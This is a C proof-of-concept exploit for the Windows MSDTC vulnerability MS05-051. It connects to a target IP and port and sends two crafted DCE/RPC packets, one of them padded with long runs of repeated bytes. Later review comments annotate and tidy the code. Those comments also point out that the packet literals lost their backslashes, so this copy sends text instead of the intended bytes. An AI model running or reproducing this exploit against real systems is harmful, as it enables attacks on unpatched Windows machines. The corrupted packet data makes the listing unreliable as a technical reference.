# Title : MS Windows MSDTC Service Remote Memory Modification PoC (MS05-051)
# Published : 2005-11-27
# Author : darkeagle
/*
MSDTC remote PoC exploit
/ by Darkeagle
/
Unl0ck Research Team
/
/ Greetingz: all UKT boys, 0x557 guys, Sowhat, GHC/RST guys
/ Exploit tested on: Windows 2000 Professional Russian Service Pack 4
/ http://exploiterz.org || http://55k7.org
/ Reference: http://security.nnov.ru/Jdocument906.html
/ ."by default on all Windows 2000 systems."
it's false: on my system the MSDTC service is turned off by default.
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <winsock.h>
#include <windows.h>
/*
 * packet1 -- first PDU sent by main().
 *
 * Decoding the escape groups as bytes gives what looks like a DCE/RPC bind:
 * version 5.0, packet type 0x0b, flags 0x03 (first + last fragment),
 * little-endian data representation, fragment length 0x0048 = 72 (which
 * matches the 72 groups in the literal), call id 1, and one presentation
 * context holding a 16-byte interface UUID plus one 16-byte transfer-syntax
 * UUID, each followed by a 4-byte version.  Presumably the interface UUID
 * is MSDTC's -- verify against the reference in the header comment.
 *
 * NOTE(review): as printed here every "x.." group has lost its backslash,
 * so this literal compiles to ASCII text (three chars per group plus a
 * terminating NUL), not to the bytes described above -- this looks like a
 * transcription artefact.  sizeof packet1 also counts that NUL.
 */
unsigned char packet1[] =
/* 16-byte common header */
"x05x00x0bx03x10x00x00x00x48x00"
"x00x00x01x00x00x00xd0x16xd0x16x00x00x00x00x01x00"
/* context list, interface UUID ... */
"x00x00x00x00x01x00xe0x0cx6bx90x0bxc7x67x10xb3x17"
"x00xddx01x06x62xdax01x00x00x00x04x5dx88x8axebx1c"
/* ... transfer-syntax UUID and its version */
"xc9x11x9fxe8x08x00x2bx10x48x60x02x00x00x00";
/*
 * packet2 -- second PDU, sent right after packet1 on the same connection.
 *
 * The first 24 groups read as a DCE/RPC request header: version 5.0,
 * packet type 0x00, flags 0x03, little-endian data representation,
 * call id 1, alloc hint 0xec, context id 0, opnum 7.  Everything after
 * that is stub data, almost all of it repeated 0x55 0x00 and 0x90 0x00
 * pairs -- long uniform runs like these are a cheap signature when
 * monitoring MSDTC (port 3372) traffic.
 *
 * NOTE(review): same transcription issue as packet1 -- the "x.." groups
 * carry no backslashes, so this literal is ASCII text rather than bytes,
 * and sizeof packet2 includes the terminating NUL.
 */
unsigned char packet2[] =
/* 24-byte request header */
"x05x00x00x03x10x00x00x00x04x01"
"x00x00x01x00x00x00xecx00x00x00x00x00x07x00"
/* stub data */
"x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x25x00x00x00x00x00"
/* 16 lines of 0x55 0x00 pairs */
"x55x00x55x00x55x00x55x00x55x00x55x00x55x00x55x00"
"x55x00x55x00x55x00x55x00x55x00x55x00x55x00x55x00"
"x55x00x55x00x55x00x55x00x55x00x55x00x55x00x55x00"
"x55x00x55x00x55x00x55x00x55x00x55x00x55x00x55x00"
"x55x00x55x00x55x00x55x00x55x00x55x00x55x00x55x00"
"x55x00x55x00x55x00x55x00x55x00x55x00x55x00x55x00"
"x55x00x55x00x55x00x55x00x55x00x55x00x55x00x55x00"
"x55x00x55x00x55x00x55x00x55x00x55x00x55x00x55x00"
"x55x00x55x00x55x00x55x00x55x00x55x00x55x00x55x00"
"x55x00x55x00x55x00x55x00x55x00x55x00x55x00x55x00"
"x55x00x55x00x55x00x55x00x55x00x55x00x55x00x55x00"
"x55x00x55x00x55x00x55x00x55x00x55x00x55x00x55x00"
"x55x00x55x00x55x00x55x00x55x00x55x00x55x00x55x00"
"x55x00x55x00x55x00x55x00x55x00x55x00x55x00x55x00"
"x55x00x55x00x55x00x55x00x55x00x55x00x55x00x55x00"
"x55x00x55x00x55x00x55x00x55x00x55x00x55x00x55x00"
/* 96 lines of 0x90 0x00 pairs */
"x90x00x90x00x90x00x90x00x90x00x90x00x90x00x90x00"
"x90x00x90x00x90x00x90x00x90x00x90x00x90x00x90x00"
"x90x00x90x00x90x00x90x00x90x00x90x00x90x00x90x00"
"x90x00x90x00x90x00x90x00x90x00x90x00x90x00x90x00"
"x90x00x90x00x90x00x90x00x90x00x90x00x90x00x90x00"
"x90x00x90x00x90x00x90x00x90x00x90x00x90x00x90x00"
"x90x00x90x00x90x00x90x00x90x00x90x00x90x00x90x00"
"x90x00x90x00x90x00x90x00x90x00x90x00x90x00x90x00"
"x90x00x90x00x90x00x90x00x90x00x90x00x90x00x90x00"
"x90x00x90x00x90x00x90x00x90x00x90x00x90x00x90x00"
"x90x00x90x00x90x00x90x00x90x00x90x00x90x00x90x00"
"x90x00x90x00x90x00x90x00x90x00x90x00x90x00x90x00"
"x90x00x90x00x90x00x90x00x90x00x90x00x90x00x90x00"
"x90x00x90x00x90x00x90x00x90x00x90x00x90x00x90x00"
"x90x00x90x00x90x00x90x00x90x00x90x00x90x00x90x00"
"x90x00x90x00x90x00x90x00x90x00x90x00x90x00x90x00"
"x90x00x90x00x90x00x90x00x90x00x90x00x90x00x90x00"
"x90x00x90x00x90x00x90x00x90x00x90x00x90x00x90x00"
"x90x00x90x00x90x00x90x00x90x00x90x00x90x00x90x00"
"x90x00x90x00x90x00x90x00x90x00x90x00x90x00x90x00"
"x90x00x90x00x90x00x90x00x90x00x90x00x90x00x90x00"
"x90x00x90x00x90x00x90x00x90x00x90x00x90x00x90x00"
"x90x00x90x00x90x00x90x00x90x00x90x00x90x00x90x00"
"x90x00x90x00x90x00x90x00x90x00x90x00x90x00x90x00"
"x90x00x90x00x90x00x90x00x90x00x90x00x90x00x90x00"
"x90x00x90x00x90x00x90x00x90x00x90x00x90x00x90x00"
"x90x00x90x00x90x00x90x00x90x00x90x00x90x00x90x00"
"x90x00x90x00x90x00x90x00x90x00x90x00x90x00x90x00"
"x90x00x90x00x90x00x90x00x90x00x90x00x90x00x90x00"
"x90x00x90x00x90x00x90x00x90x00x90x00x90x00x90x00"
"x90x00x90x00x90x00x90x00x90x00x90x00x90x00x90x00"
"x90x00x90x00x90x00x90x00x90x00x90x00x90x00x90x00"
"x90x00x90x00x90x00x90x00x90x00x90x00x90x00x90x00"
"x90x00x90x00x90x00x90x00x90x00x90x00x90x00x90x00"
"x90x00x90x00x90x00x90x00x90x00x90x00x90x00x90x00"
"x90x00x90x00x90x00x90x00x90x00x90x00x90x00x90x00"
"x90x00x90x00x90x00x90x00x90x00x90x00x90x00x90x00"
"x90x00x90x00x90x00x90x00x90x00x90x00x90x00x90x00"
"x90x00x90x00x90x00x90x00x90x00x90x00x90x00x90x00"
"x90x00x90x00x90x00x90x00x90x00x90x00x90x00x90x00"
"x90x00x90x00x90x00x90x00x90x00x90x00x90x00x90x00"
"x90x00x90x00x90x00x90x00x90x00x90x00x90x00x90x00"
"x90x00x90x00x90x00x90x00x90x00x90x00x90x00x90x00"
"x90x00x90x00x90x00x90x00x90x00x90x00x90x00x90x00"
"x90x00x90x00x90x00x90x00x90x00x90x00x90x00x90x00"
"x90x00x90x00x90x00x90x00x90x00x90x00x90x00x90x00"
"x90x00x90x00x90x00x90x00x90x00x90x00x90x00x90x00"
"x90x00x90x00x90x00x90x00x90x00x90x00x90x00x90x00"
"x90x00x90x00x90x00x90x00x90x00x90x00x90x00x90x00"
"x90x00x90x00x90x00x90x00x90x00x90x00x90x00x90x00"
"x90x00x90x00x90x00x90x00x90x00x90x00x90x00x90x00"
"x90x00x90x00x90x00x90x00x90x00x90x00x90x00x90x00"
"x90x00x90x00x90x00x90x00x90x00x90x00x90x00x90x00"
"x90x00x90x00x90x00x90x00x90x00x90x00x90x00x90x00"
"x90x00x90x00x90x00x90x00x90x00x90x00x90x00x90x00"
"x90x00x90x00x90x00x90x00x90x00x90x00x90x00x90x00"
"x90x00x90x00x90x00x90x00x90x00x90x00x90x00x90x00"
"x90x00x90x00x90x00x90x00x90x00x90x00x90x00x90x00"
"x90x00x90x00x90x00x90x00x90x00x90x00x90x00x90x00"
"x90x00x90x00x90x00x90x00x90x00x90x00x90x00x90x00"
"x90x00x90x00x90x00x90x00x90x00x90x00x90x00x90x00"
"x90x00x90x00x90x00x90x00x90x00x90x00x90x00x90x00"
"x90x00x90x00x90x00x90x00x90x00x90x00x90x00x90x00"
"x90x00x90x00x90x00x90x00x90x00x90x00x90x00x90x00"
"x90x00x90x00x90x00x90x00x90x00x90x00x90x00x90x00"
"x90x00x90x00x90x00x90x00x90x00x90x00x90x00x90x00"
"x90x00x90x00x90x00x90x00x90x00x90x00x90x00x90x00"
"x90x00x90x00x90x00x90x00x90x00x90x00x90x00x90x00"
"x90x00x90x00x90x00x90x00x90x00x90x00x90x00x90x00"
"x90x00x90x00x90x00x90x00x90x00x90x00x90x00x90x00"
"x90x00x90x00x90x00x90x00x90x00x90x00x90x00x90x00"
"x90x00x90x00x90x00x90x00x90x00x90x00x90x00x90x00"
"x90x00x90x00x90x00x90x00x90x00x90x00x90x00x90x00"
"x90x00x90x00x90x00x90x00x90x00x90x00x90x00x90x00"
"x90x00x90x00x90x00x90x00x90x00x90x00x90x00x90x00"
"x90x00x90x00x90x00x90x00x90x00x90x00x90x00x90x00"
"x90x00x90x00x90x00x90x00x90x00x90x00x90x00x90x00"
"x90x00x90x00x90x00x90x00x90x00x90x00x90x00x90x00"
"x90x00x90x00x90x00x90x00x90x00x90x00x90x00x90x00"
"x90x00x90x00x90x00x90x00x90x00x90x00x90x00x90x00"
"x90x00x90x00x90x00x90x00x90x00x90x00x90x00x90x00"
"x90x00x90x00x90x00x90x00x90x00x90x00x90x00x90x00"
"x90x00x90x00x90x00x90x00x90x00x90x00x90x00x90x00"
"x90x00x90x00x90x00x90x00x90x00x90x00x90x00x90x00"
"x90x00x90x00x90x00x90x00x90x00x90x00x90x00x90x00"
"x90x00x90x00x90x00x90x00x90x00x90x00x90x00x90x00"
"x90x00x90x00x90x00x90x00x90x00x90x00x90x00x90x00"
"x90x00x90x00x90x00x90x00x90x00x90x00x90x00x90x00"
"x90x00x90x00x90x00x90x00x90x00x90x00x90x00x90x00"
"x90x00x90x00x90x00x90x00x90x00x90x00x90x00x90x00"
"x90x00x90x00x90x00x90x00x90x00x90x00x90x00x90x00"
"x90x00x90x00x90x00x90x00x90x00x90x00x90x00x90x00"
"x90x00x90x00x90x00x90x00x90x00x90x00x90x00x90x00"
"x90x00x90x00x90x00x90x00x90x00x90x00x90x00x90x00"
"x90x00x90x00x90x00x90x00x90x00x90x00x90x00x90x00"
"x90x00x90x00x90x00x90x00x90x00x90x00x90x00x90x00";
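/*
 * Clear the console and print the usage banner.
 *
 * proga: argv[0], echoed in the usage line.
 * Returns 0.  (The function was declared int but fell off the end without
 * a return statement, which leaves the value indeterminate.)
 *
 * The message strings had lost the backslash of every "\n" escape in the
 * listing; they are restored here so each line actually ends in a newline.
 */
int banner(const char *proga)
{
    system("cls");   /* spawns cmd.exe just to clear the screen; cosmetic */
    printf("** MSDTC remote PoC Exploit **\n");
    printf(" by Darkeagle \n");
    printf("\nUse: %s <ip> <port>\n", proga);
    printf("Default port: 3372\n");
    printf("Have fun!\n");
    return 0;
}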
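/*
 * Entry point: connect to <ip>:<port> over TCP and send packet1 followed by
 * packet2 on the same connection.
 *
 * argv[1] is a dotted-quad IPv4 address (inet_addr() -- host names are not
 * resolved); argv[2] is the TCP port.
 * Returns EXIT_SUCCESS only when both sends complete.  Usage errors, an
 * unparsable port or address, and every Winsock failure print a message and
 * return EXIT_FAILURE -- the previous version called exit(0) on each failure
 * path, so a caller could not distinguish failure from success.
 *
 * Other fixes: WSAStartup() and socket() results are checked (socket()
 * returns INVALID_SOCKET, not -1, on Winsock); sockaddr_in is zeroed so
 * sin_zero is not left indeterminate; the port is parsed with strtol and
 * range-checked instead of atoi; the send() buffers are cast to const char *
 * to match the Winsock prototype; the lost "\n" escapes in the messages are
 * restored.
 */
int main(int argc, char *argv[])
{
    if (argc < 3) {
        banner(argv[0]);
        return EXIT_FAILURE;
    }
    banner(argv[0]);

    /* strtol rather than atoi so junk and out-of-range ports are rejected */
    char *end = NULL;
    long port = strtol(argv[2], &end, 10);
    if (end == argv[2] || *end != '\0' || port < 1 || port > 65535) {
        printf("[-] invalid port: %s\n", argv[2]);
        return EXIT_FAILURE;
    }
    const char *ip_addr = argv[1];

    printf("[] preparing..\n");
    WSADATA wsa;
    if (WSAStartup(MAKEWORD(2, 0), &wsa) != 0) {
        printf("[-] WSAStartup failed!\n");
        return EXIT_FAILURE;
    }

    int rc = EXIT_FAILURE;
    SOCKET sock = socket(AF_INET, SOCK_STREAM, IPPROTO_IP);
    if (sock == INVALID_SOCKET) {
        printf("[-] socket failed!\n");
        goto out_wsa;
    }

    struct sockaddr_in addr = {0};
    addr.sin_family = AF_INET;
    addr.sin_port = htons((unsigned short)port);
    addr.sin_addr.s_addr = inet_addr(ip_addr);
    /* INADDR_NONE is also the encoding of 255.255.255.255; acceptable here
     * since a broadcast address is not a meaningful connect() target */
    if (addr.sin_addr.s_addr == INADDR_NONE) {
        printf("[-] invalid ip address: %s\n", ip_addr);
        goto out_sock;
    }

    printf("[] connecting..\n");
    if (connect(sock, (struct sockaddr *)&addr, sizeof addr) == SOCKET_ERROR) {
        printf("[-] connection failed!\n");
        goto out_sock;
    }

    printf("[] sending crafted packet...");
    /* sizeof counts each literal's terminating NUL, so one byte beyond the
     * escape groups is sent; kept as written */
    if (send(sock, (const char *)packet1, sizeof packet1, 0) == SOCKET_ERROR) {
        printf("[-] send failed!\n");
        goto out_sock;
    }
    if (send(sock, (const char *)packet2, sizeof packet2, 0) == SOCKET_ERROR) {
        printf("[-] send failed!\n");
        goto out_sock;
    }
    printf("ok!\n");
    rc = EXIT_SUCCESS;

out_sock:
    closesocket(sock);
out_wsa:
    WSACleanup();
    return rc;
}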